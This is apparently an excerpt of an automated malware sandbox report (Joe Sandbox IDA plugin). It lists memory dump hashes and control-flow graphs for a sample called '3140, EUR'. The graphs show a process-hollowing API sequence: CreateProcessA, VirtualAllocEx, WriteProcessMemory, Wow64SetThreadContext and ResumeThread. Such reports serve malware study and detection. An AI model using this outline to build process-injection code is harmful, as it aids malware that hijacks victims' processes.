                                                            • Instruction Fuzzy Hash: 9581B3B4E102198FDB08CFE9C9846EEFBB2BF89301F14852AE815AB354DB355905CF54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 53e0d6f546ddbac3fc91e9576b195d21553bce8a71526bfa595a74b3db80fbd1
                                                            • Instruction ID: 82a8a377b4fbc4a42ad40558359485b11caeb501767162664c058c6dbd20f010
                                                            • Opcode Fuzzy Hash: 53e0d6f546ddbac3fc91e9576b195d21553bce8a71526bfa595a74b3db80fbd1
                                                            • Instruction Fuzzy Hash: FAD13EB4D1021ADFCB44CF9AD4814AEFBB2FF8A300F54D569D916AB214D734A982CF94
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1ba5e82742267f45ec138ba2c97a8f2762318df98384bdff0058efe1326c31c0
                                                            • Instruction ID: 354c482aa082da49d55ea4fc781853ba0d8650ccf8d7dc8e5e6b8d53dc323ded
                                                            • Opcode Fuzzy Hash: 1ba5e82742267f45ec138ba2c97a8f2762318df98384bdff0058efe1326c31c0
                                                            • Instruction Fuzzy Hash: 1AD151B4D1021ACFCB44CFAAC4814AEFBB2FF89300F54D566D916A7254D7349982CF90
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a6eb1d6036bee732956d84252ff3d6bf8af608b420add1e078aa30c66224603
                                                            • Instruction ID: 0b6cd5c3b522ef335f6414af83fedf8163857b0ef37c355544f699ad8b251eb8
                                                            • Opcode Fuzzy Hash: 5a6eb1d6036bee732956d84252ff3d6bf8af608b420add1e078aa30c66224603
                                                            • Instruction Fuzzy Hash: 3C81E5B5E1524ADFCB04CFA6D4819AEFBB2FB89310F14942AE416B7264DB349942CF40
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54cba3f725971908d6b2f53458cf675f28a708eb92f2cc38752c7111f333b01c
                                                            • Instruction ID: 342800630f484173ef6541d74cfd227817da466835387fd17a57fbe586cb7642
                                                            • Opcode Fuzzy Hash: 54cba3f725971908d6b2f53458cf675f28a708eb92f2cc38752c7111f333b01c
                                                            • Instruction Fuzzy Hash: C171C3B4D15249DFCB04CFEAD58199EFBB2FB89310F14942AE516BB264DB349942CF40
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5aee66efb52bf6e830fac11fba04ce71ba20103da0ace5b7cff00e7da85cfcb
                                                            • Instruction ID: 89d9e559ae40f73f879bceac88d198e23d5dc56d3e4c2bb5e3c9d423a327aa80
                                                            • Opcode Fuzzy Hash: a5aee66efb52bf6e830fac11fba04ce71ba20103da0ace5b7cff00e7da85cfcb
                                                            • Instruction Fuzzy Hash: 525106B5E14209AFCB44CFA6D8455AEBBF2BB8A300F00952AE416F7354DB3859018F54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32601768f41d1a7ea4ab823a76aa5f702282e537c5c36694866602c045740934
                                                            • Instruction ID: f992ca3cfa85e427a2ab55e0084e611446211fc45734b935f660ba3d2e0c0244
                                                            • Opcode Fuzzy Hash: 32601768f41d1a7ea4ab823a76aa5f702282e537c5c36694866602c045740934
                                                            • Instruction Fuzzy Hash: 625106B5E14209AFCB48CFA6D9455AEFBF2FB8A310F10942AE416F7354DB3899018F54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3da5c4da2703160655a1900f3cbcce2c4fbe29ab13ed41a2a2abe3190ed8712e
                                                            • Instruction ID: 05b08760d9659e38994dc5023575bdb773b2e84687d221f427ac87c082d134f9
                                                            • Opcode Fuzzy Hash: 3da5c4da2703160655a1900f3cbcce2c4fbe29ab13ed41a2a2abe3190ed8712e
                                                            • Instruction Fuzzy Hash: E7312CB0E056588FDB59CFA6D8543DEBFB2AFC9310F14C0AAD405AB254DB740949CF50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 724e3463b709eebebdf700ac261dd524193d389b7fdbb3d59dbc706fbb463f1b
                                                            • Instruction ID: e1addde1d9b8fadb706095413ea2ac30bb321fe020a146b966c6669b08bcb426
                                                            • Opcode Fuzzy Hash: 724e3463b709eebebdf700ac261dd524193d389b7fdbb3d59dbc706fbb463f1b
                                                            • Instruction Fuzzy Hash: F621F6B1E006188BEB58CFABD9443DEFBB2AFC8310F14C06AD909A6254DB751A46CF50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6375ddd479bc134832e3f85a4379dc4d050f47c3dbfa30663d10e322789cddde
                                                            • Instruction ID: cd5ae2525871469287a44f7666dba246f6b2696f28e9639c2302a079e3a31309
                                                            • Opcode Fuzzy Hash: 6375ddd479bc134832e3f85a4379dc4d050f47c3dbfa30663d10e322789cddde
                                                            • Instruction Fuzzy Hash: CF21DAB1E056189FEB18CF67D94079EBBF3AFC9310F14D0BAD449A6254DB340A458F51
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b9947b92a48ca3160ea78ffd8151294cc1ebb21eb944c2f494c95736b56fa70
                                                            • Instruction ID: d491fa5f0a046824dfc90503a9361b3f058d3d688107f3547d81649aeaa25d1d
                                                            • Opcode Fuzzy Hash: 4b9947b92a48ca3160ea78ffd8151294cc1ebb21eb944c2f494c95736b56fa70
                                                            • Instruction Fuzzy Hash: C021C4B1E046189FEB18CF6BD84079EBAF7AFC9310F04D1BAD509A6264EB340A458F51

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 73 764eec4-764ef65 76 764ef67-764ef71 73->76 77 764ef9e-764efbe 73->77 76->77 78 764ef73-764ef75 76->78 84 764eff7-764f026 77->84 85 764efc0-764efca 77->85 79 764ef77-764ef81 78->79 80 764ef98-764ef9b 78->80 82 764ef85-764ef94 79->82 83 764ef83 79->83 80->77 82->82 86 764ef96 82->86 83->82 91 764f05f-764f119 CreateProcessA 84->91 92 764f028-764f032 84->92 85->84 87 764efcc-764efce 85->87 86->80 89 764efd0-764efda 87->89 90 764eff1-764eff4 87->90 93 764efdc 89->93 94 764efde-764efed 89->94 90->84 105 764f122-764f1a8 91->105 106 764f11b-764f121 91->106 92->91 96 764f034-764f036 92->96 93->94 94->94 95 764efef 94->95 95->90 97 764f038-764f042 96->97 98 764f059-764f05c 96->98 100 764f044 97->100 101 764f046-764f055 97->101 98->91 100->101 101->101 103 764f057 101->103 103->98 116 764f1b8-764f1bc 105->116 117 764f1aa-764f1ae 105->117 106->105 119 764f1cc-764f1d0 116->119 120 764f1be-764f1c2 116->120 117->116 118 764f1b0 117->118 118->116 122 764f1e0-764f1e4 119->122 123 764f1d2-764f1d6 119->123 120->119 121 764f1c4 120->121 121->119 124 764f1f6-764f1fd 122->124 125 764f1e6-764f1ec 122->125 123->122 126 764f1d8 123->126 127 764f214 124->127 128 764f1ff-764f20e 124->128 125->124 126->122 130 764f215 127->130 128->127 130->130
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0764F106
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 0a03220541d0459fe93b1a3e17b16866cc619c4a7f96373dcb55b7e2ae763046
                                                            • Instruction ID: 8a66e36b98531dd547b816287ba2c136a716e2cee1002131d48395feef92bb19
                                                            • Opcode Fuzzy Hash: 0a03220541d0459fe93b1a3e17b16866cc619c4a7f96373dcb55b7e2ae763046
                                                            • Instruction Fuzzy Hash: BEA13BB1D0025ADFDB10CFA8C841BEDBBB2BF48314F188569E849E7250DB759985CF92

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 131 764eed0-764ef65 133 764ef67-764ef71 131->133 134 764ef9e-764efbe 131->134 133->134 135 764ef73-764ef75 133->135 141 764eff7-764f026 134->141 142 764efc0-764efca 134->142 136 764ef77-764ef81 135->136 137 764ef98-764ef9b 135->137 139 764ef85-764ef94 136->139 140 764ef83 136->140 137->134 139->139 143 764ef96 139->143 140->139 148 764f05f-764f119 CreateProcessA 141->148 149 764f028-764f032 141->149 142->141 144 764efcc-764efce 142->144 143->137 146 764efd0-764efda 144->146 147 764eff1-764eff4 144->147 150 764efdc 146->150 151 764efde-764efed 146->151 147->141 162 764f122-764f1a8 148->162 163 764f11b-764f121 148->163 149->148 153 764f034-764f036 149->153 150->151 151->151 152 764efef 151->152 152->147 154 764f038-764f042 153->154 155 764f059-764f05c 153->155 157 764f044 154->157 158 764f046-764f055 154->158 155->148 157->158 158->158 160 764f057 158->160 160->155 173 764f1b8-764f1bc 162->173 174 764f1aa-764f1ae 162->174 163->162 176 764f1cc-764f1d0 173->176 177 764f1be-764f1c2 173->177 174->173 175 764f1b0 174->175 175->173 179 764f1e0-764f1e4 176->179 180 764f1d2-764f1d6 176->180 177->176 178 764f1c4 177->178 178->176 181 764f1f6-764f1fd 179->181 182 764f1e6-764f1ec 179->182 180->179 183 764f1d8 180->183 184 764f214 181->184 185 764f1ff-764f20e 181->185 182->181 183->179 187 764f215 184->187 185->184 187->187
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0764F106
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 3c2c3967e2f1c60ae8a8de35babf7565120546dbb02b58e5d5df038acd22710d
                                                            • Instruction ID: ce93121feac31ad32cc4c758bb23584b58fb4f57ab81c29305f58b85d57621c9
                                                            • Opcode Fuzzy Hash: 3c2c3967e2f1c60ae8a8de35babf7565120546dbb02b58e5d5df038acd22710d
                                                            • Instruction Fuzzy Hash: 26915CB1D0025ADFDB10CFA8C841BDDBBF2BF48314F1881A9E849A7250DB759985CF92

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 297 764e560-764e56d 298 764e56f-764e597 297->298 299 764e5c8-764e637 ResumeThread 297->299 302 764e59e-764e5a1 298->302 303 764e599 298->303 306 764e640-764e665 299->306 307 764e639-764e63f 299->307 305 764e5a9-764e5b2 302->305 303->302 307->306
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 752bf3b4219e15b4de6a8a513f6ac2d21dde0184666b390d4c346b47182dada8
                                                            • Instruction ID: dcfe26f692592be4f808106ab8fb08ada31b46cd0d26613552dc513c746cd615
                                                            • Opcode Fuzzy Hash: 752bf3b4219e15b4de6a8a513f6ac2d21dde0184666b390d4c346b47182dada8
                                                            • Instruction Fuzzy Hash: 92319AB19002899FCB10DFA9C4417DEFBF4EF89324F24805AD419A7250CB39A941CBA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 311 764ec41-764ec96 314 764eca6-764ece5 WriteProcessMemory 311->314 315 764ec98-764eca4 311->315 317 764ece7-764eced 314->317 318 764ecee-764ed1e 314->318 315->314 317->318
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0764ECD8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: f834b21b1f46a4ff33a4675efdae1e18fea2eb074fbe6aa3f88733c6e2640eb9
                                                            • Instruction ID: 989abd2c1dc27027391bfe270c8858383e4adbaa0aa8fa8d4b3c4e67281d4428
                                                            • Opcode Fuzzy Hash: f834b21b1f46a4ff33a4675efdae1e18fea2eb074fbe6aa3f88733c6e2640eb9
                                                            • Instruction Fuzzy Hash: 542135B19003599FCB10CFAAC985BDEBBF5FF48310F10842AE959A7250D779A944CFA4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 322 764ec48-764ec96 324 764eca6-764ece5 WriteProcessMemory 322->324 325 764ec98-764eca4 322->325 327 764ece7-764eced 324->327 328 764ecee-764ed1e 324->328 325->324 327->328
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0764ECD8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 221179a317986368727d8de34703ce808ce2004776d2141b384e1431cff480cc
                                                            • Instruction ID: 081bcd22fc74a21e89377efdc2400eae5ef1fac047b58c97339d6c7b337ba521
                                                            • Opcode Fuzzy Hash: 221179a317986368727d8de34703ce808ce2004776d2141b384e1431cff480cc
                                                            • Instruction Fuzzy Hash: 802126B19003599FCB10DFA9C985BDEBBF5FF48310F10842AE959A7250C7799944CFA4

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 332 764ed31-764edc5 ReadProcessMemory 336 764edc7-764edcd 332->336 337 764edce-764edfe 332->337 336->337
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0764EDB8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: f8e15132e12b194b8c5af032d316faefe78ace2412caecd1f79e44e521d72899
                                                            • Instruction ID: 2a181b77f71052b46139fc955693bb3e10998e22eff267ef01d9725880b03458
                                                            • Opcode Fuzzy Hash: f8e15132e12b194b8c5af032d316faefe78ace2412caecd1f79e44e521d72899
                                                            • Instruction Fuzzy Hash: 1C2127B18002599FCB10DFAAC880ADEFBF5FF48310F14842AE959A7250D7399544CBA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 341 764e670-764e6c3 344 764e6c5-764e6d1 341->344 345 764e6d3-764e6d6 341->345 344->345 346 764e6dd-764e703 Wow64SetThreadContext 345->346 347 764e705-764e70b 346->347 348 764e70c-764e73c 346->348 347->348
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0764E6F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 27042d581cec3cfd2eaafab0c237f923f2bb78a40715a1af89185f57f503b2cf
                                                            • Instruction ID: c66618d5bbd8a9e7e956cc47e72ed2ac3697ce52b0edb7069390cae790fa2638
                                                            • Opcode Fuzzy Hash: 27042d581cec3cfd2eaafab0c237f923f2bb78a40715a1af89185f57f503b2cf
                                                            • Instruction Fuzzy Hash: 822139B19002198FDB10DFAAC5857EEBBF5BF48324F14842AD459B7290C7789544CFA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 352 764e678-764e6c3 354 764e6c5-764e6d1 352->354 355 764e6d3-764e703 Wow64SetThreadContext 352->355 354->355 357 764e705-764e70b 355->357 358 764e70c-764e73c 355->358 357->358
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0764E6F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 1c04415160e83c3f139f2668fb6fc8dea42c413fd0b5e2a72a217fb34c076fca
                                                            • Instruction ID: 83c15bcdbc4bdfea5e0dc1c9fac049f0d4232203ff9793a4f4d8a3328c7047ec
                                                            • Opcode Fuzzy Hash: 1c04415160e83c3f139f2668fb6fc8dea42c413fd0b5e2a72a217fb34c076fca
                                                            • Instruction Fuzzy Hash: 212138B1D002099FDB10DFAAC4857EEBBF4FF48324F14842AD459A7240C7799944CFA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 362 764ed38-764edc5 ReadProcessMemory 365 764edc7-764edcd 362->365 366 764edce-764edfe 362->366 365->366
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0764EDB8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: a486c60a8594855ff1e056b01353881161619a0e8a1ad8b8bf1bed81a71056e3
                                                            • Instruction ID: 6f370bd4ba63a0c5732adc9304ed33a7ea79e0ea851129563fb63ebc9638ec69
                                                            • Opcode Fuzzy Hash: a486c60a8594855ff1e056b01353881161619a0e8a1ad8b8bf1bed81a71056e3
                                                            • Instruction Fuzzy Hash: F92128B1D002599FCF10DFAAC841AEEFBF5FF48310F14842AE559A7250C7799944CBA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 370 764eb80-764ebcb 373 764ebd2-764ec03 VirtualAllocEx 370->373 374 764ec05-764ec0b 373->374 375 764ec0c-764ec31 373->375 374->375
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0764EBF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: f57f1a95e7aa3cfcbe35fcf5a38f40a0c4d3918729b295d1ad4d4e10ff6e1fba
                                                            • Instruction ID: 8b6f0d7fc916386b285cf3ee8ede0b0656ac8ebcf643eadd16b74f3ed693341b
                                                            • Opcode Fuzzy Hash: f57f1a95e7aa3cfcbe35fcf5a38f40a0c4d3918729b295d1ad4d4e10ff6e1fba
                                                            • Instruction Fuzzy Hash: 971189B29002499FCB20DFAAC805BDEBFF5EF48320F108419E915A7250C7759940CFA1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 379 764eb88-764ec03 VirtualAllocEx 382 764ec05-764ec0b 379->382 383 764ec0c-764ec31 379->383 382->383
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0764EBF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 85942755f6c0459725b45310f8c2958a0877daa42b6208eba52a4560c93cebde
                                                            • Instruction ID: 4eb68582c00262985ba9f7b942b5c24f532b71ef945c0708368c721cee8970a1
                                                            • Opcode Fuzzy Hash: 85942755f6c0459725b45310f8c2958a0877daa42b6208eba52a4560c93cebde
                                                            • Instruction Fuzzy Hash: C81137B29002499FCB10DFAAC845BDEFFF5EF88320F148419E559A7250C775A944CFA5

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 387 764e5c2-764e637 ResumeThread 391 764e640-764e665 387->391 392 764e639-764e63f 387->392 392->391
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 61a30cb306738dfbd31fe6c6a0d550f394c6b02d0147bba0aab5ca24454296bf
                                                            • Instruction ID: 0b8501bf42d996b43198853cf411a5e7d0dc769dd8168d48538ec2a467540a48
                                                            • Opcode Fuzzy Hash: 61a30cb306738dfbd31fe6c6a0d550f394c6b02d0147bba0aab5ca24454296bf
                                                            • Instruction Fuzzy Hash: 4A1149B19002498FCB10DFAAD4457DEFBF4EF88324F24841AD459A7250CB75A544CBA5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741084589.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7640000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 25068a9cae6382714fe8560a9930c746b75481277af838b3efdd9607338a3eac
                                                            • Instruction ID: 129fc478d234fc1bc3c587defc855dfc7a0672989686cda2c04fb45e966d1b2d
                                                            • Opcode Fuzzy Hash: 25068a9cae6382714fe8560a9930c746b75481277af838b3efdd9607338a3eac
                                                            • Instruction Fuzzy Hash: C5113AB1D002598FCB10DFAAC4457DEFBF4EF88324F24841AD459A7250C775A944CF95
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00AFBAC6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1724046659.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_af0000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 14a5a83b44a3858181c5bc6afd4e7fb36f622a1cf1d30858bf349a866036cb5f
                                                            • Instruction ID: 972528b2d974d3921b00c14c49645e49eea44b6183f1951764fd848cce37ca1d
                                                            • Opcode Fuzzy Hash: 14a5a83b44a3858181c5bc6afd4e7fb36f622a1cf1d30858bf349a866036cb5f
                                                            • Instruction Fuzzy Hash: 10110FB6C002498FCB10DF9AD844ADEFBF4AB88320F14846AD558A7610C379A545CFA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 5ff24802f6284604c3340f07c8d061feb6f862788adcc4e1296204c2c3a23a95
                                                            • Instruction ID: b7507bd1bba13c4a236e67f44ae032941489c3ef343ba9c2ef3f32205b8b763b
                                                            • Opcode Fuzzy Hash: 5ff24802f6284604c3340f07c8d061feb6f862788adcc4e1296204c2c3a23a95
                                                            • Instruction Fuzzy Hash: C4D11C7591020ACFCF04CFA8C4949EDB7B1FF58325B218659D806B7259D734AE9ACF80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: 232678fff0a9f535a9a4a48320224d1d3f6881859c238a1cb956cb5c2c2005f8
                                                            • Instruction ID: 5adb930440d952044ac6f5787c6519692eab747674ae838631a4c08349f139e9
                                                            • Opcode Fuzzy Hash: 232678fff0a9f535a9a4a48320224d1d3f6881859c238a1cb956cb5c2c2005f8
                                                            • Instruction Fuzzy Hash: 5EA1EC7590020ACFCF05DFA4C4848DDB7B1FF58325B218659D816BB259EB34AE9ACF80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1742500185.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7850000_3140, EUR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Te^q
                                                            • API String ID: 0-671973202
                                                            • Opcode ID: d3dba55451290ab279aa8c418a3c812958af6c81bcc128d83e3fd6c96679732c
                                                            • Instruction ID: e4b7447c05fcfbf8ff774cf264c3748d71990da13590c37e9674997dbb385585
                                                            • Opcode Fuzzy Hash: d3dba55451290ab279aa8c418a3c812958af6c81bcc128d83e3fd6c96679732c
                                                            • Instruction Fuzzy Hash: DA516CB1B002059FCB15EFB9984897EBBE6EFD4360B148929E419D7351EF309D068791
                                                            Strings
                                                            Memory Dump Source
